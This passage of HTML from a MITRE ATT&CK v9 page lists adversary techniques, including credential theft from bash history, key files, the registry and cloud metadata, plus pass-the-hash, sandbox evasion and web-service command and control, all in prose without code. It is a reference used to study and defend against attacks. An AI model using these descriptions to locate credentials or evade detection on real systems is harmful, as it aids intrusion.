T1111 </a> </td> <td> <a href="/versions/v9/techniques/T1111"> Two-Factor Authentication Interception </a> </td> <td> Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1552"> T1552 </a> </td> <td> <a href="/versions/v9/techniques/T1552"> Unsecured Credentials </a> </td> <td> Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. <a href="/versions/v9/techniques/T1552/003">Bash History</a>), operating system or application-specific repositories (e.g. <a href="/versions/v9/techniques/T1552/002">Credentials in Registry</a>), or other specialized files/artifacts (e.g. <a href="/versions/v9/techniques/T1552/004">Private Keys</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1552/001"> Credentials In Files </a> </td> <td> Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1552/002"> Credentials in Registry </a> </td> <td> Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1552/003"> Bash History </a> </td> <td> Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1552/004"> Private Keys </a> </td> <td> Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1552/005"> Cloud Instance Metadata API </a> </td> <td> Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1552/006"> Group Policy Preferences </a> </td> <td> Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1552/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1552/007"> Container API </a> </td> <td> Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1535"> T1535 </a> </td> <td> <a href="/versions/v9/techniques/T1535"> Unused/Unsupported Cloud Regions </a> </td> <td> Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1550"> T1550 </a> </td> <td> <a href="/versions/v9/techniques/T1550"> Use Alternate Authentication Material </a> </td> <td> Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1550/001"> Application Access Token </a> </td> <td> Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1550/002"> Pass the Hash </a> </td> <td> Adversaries may "pass the hash" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1550/003"> Pass the Ticket </a> </td> <td> Adversaries may "pass the ticket" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1550/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1550/004"> Web Session Cookie </a> </td> <td> Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1204"> T1204 </a> </td> <td> <a href="/versions/v9/techniques/T1204"> User Execution </a> </td> <td> An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of <a href="/versions/v9/techniques/T1566">Phishing</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1204/001"> Malicious Link </a> </td> <td> An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from <a href="/versions/v9/techniques/T1566/002">Spearphishing Link</a>. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via <a href="/versions/v9/techniques/T1203">Exploitation for Client Execution</a>. Links may also lead users to download files that require execution via <a href="/versions/v9/techniques/T1204/002">Malicious File</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1204/002"> Malicious File </a> </td> <td> An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from <a href="/versions/v9/techniques/T1566/001">Spearphishing Attachment</a>. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1204/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1204/003"> Malicious Image </a> </td> <td> Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via <a href="/versions/v9/techniques/T1608/001">Upload Malware</a>, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1078"> T1078 </a> </td> <td> <a href="/versions/v9/techniques/T1078"> Valid Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1078/001"> Default Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1078/002"> Domain Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1078/003"> Local Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1078/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1078/004"> Cloud Accounts </a> </td> <td> Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1125"> T1125 </a> </td> <td> <a href="/versions/v9/techniques/T1125"> Video Capture </a> </td> <td> An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1497"> T1497 </a> </td> <td> <a href="/versions/v9/techniques/T1497"> Virtualization/Sandbox Evasion </a> </td> <td> Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1497/001"> System Checks </a> </td> <td> Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1497/002"> User Activity Based Checks </a> </td> <td> Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from <a href="/versions/v9/techniques/T1497">Virtualization/Sandbox Evasion</a> during automated discovery to shape follow-on behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1497/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1497/003"> Time Based Evasion </a> </td> <td> Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1600"> T1600 </a> </td> <td> <a href="/versions/v9/techniques/T1600"> Weaken Encryption </a> </td> <td> Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1600/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1600/001"> Reduce Key Space </a> </td> <td> Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1600/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1600/002"> Disable Crypto Hardware </a> </td> <td> Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1102"> T1102 </a> </td> <td> <a href="/versions/v9/techniques/T1102"> Web Service </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1102/001"> Dead Drop Resolver </a> </td> <td> Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1102/002"> Bidirectional Communication </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1102/003"> One-Way Communication </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1047"> T1047 </a> </td> <td> <a href="/versions/v9/techniques/T1047"> Windows Management Instrumentation </a> </td> <td> Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1220"> T1220 </a> </td> <td> <a href="/versions/v9/techniques/T1220"> XSL Script Processing </a> </td> <td> Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. </td> </tr> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!--stop-indexing-for-search--> <div class="overlay search" id="search-overlay" style="display: none;"> <div class="overlay-inner"> <!-- text input for searching --> <div class="search-header"> <div class="search-input"> <input type="text" id="search-input" placeholder="search"> </div> <div class="search-icons"> <div class="search-parsing-icon spinner-border" style="display: none" id="search-parsing-icon"></div> <div class="close-search-icon" id="close-search-icon">&times;</div> </div> </div> <!-- results and controls for loading more results --> <div id="search-body" class="search-body"> <div class="results" id="search-results"> <!-- content will be appended here on search --> </div> <div id="load-more-results" class="load-more-results"> <button class="btn btn-default" id="load-more-results-button">load more results</button> </div> </div> </div> </div> </div> <footer class="footer p-3"> <div class="container-fluid"> <div class="row"> <div class="col-4 col-sm-4 col-md-3"> <div class="footer-center-responsive my-auto"> <a href="https://www.mitre.org" target="_blank" rel="noopener" aria-label="MITRE"> <img src="/versions/v9/theme/images/mitrelogowhiteontrans.gif" class="mitre-logo-wtrans"> </a> </div> </div> <div class="col-2 col-sm-2 footer-responsive-break"></div> <div class="col-6 col-sm-6 text-center"> <p> © 2015-2021, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. </p> <div class="row"> <div class="col text-right"> <small> <a href="/versions/v9/resources/privacy" class="footer-link">Privacy Policy</a> </small> </div> <div class="col text-center"> <small> <a href="/versions/v9/resources/terms-of-use" class="footer-link">Terms of Use</a> </small> </div> <div class="col text-left "> <small> <a href="/versions/v9/resources/changelog.html" class="footer-link" data-toggle="tooltip" data-placement="top" title="ATT&amp;CK content version 9.0&#013;Website version 3.3.1">ATT&CK v9.0</a> </small> </div> </div> </div> <div class="w-100 p-2 footer-responsive-break"></div> <div class="col"> <div class="footer-float-right-responsive-brand"> <div class="mb-1"> <a href="https://twitter.com/MITREattack" class="btn btn-primary w-100"> <!-- <i class="fa fa-twitter"></i> --> <img src="/versions/v9/theme/images/twitter.png" class="mr-1 twitter-icon"> <b>@MITREattack</b> </a> </div> <div class=""> <a href="/versions/v9/contact" class="btn btn-primary w-100"> Contact </a> </div> </div> </div> </div> </div> </div> </footer> </div> <!--SCRIPTS--> <script src="/versions/v9/theme/scripts/jquery-3.5.1.min.js"></script> <script src="/versions/v9/theme/scripts/popper.min.js"></script> <script src="/versions/v9/theme/scripts/bootstrap.bundle.min.js"></script> <script src="/versions/v9/theme/scripts/site.js"></script> <script src="/versions/v9/theme/scripts/flexsearch.es5.js"></script> <script src="/versions/v9/theme/scripts/localforage.min.js"></script> <script src="/versions/v9/theme/scripts/settings.js?4271"></script> <script src="/versions/v9/theme/scripts/search_babelized.js"></script> <!--SCRIPTS--> <script src="/versions/v9/theme/scripts/navigation.js"></script> </body> </html>

Pages: 1 2 3 4 5 6 7 8 9 10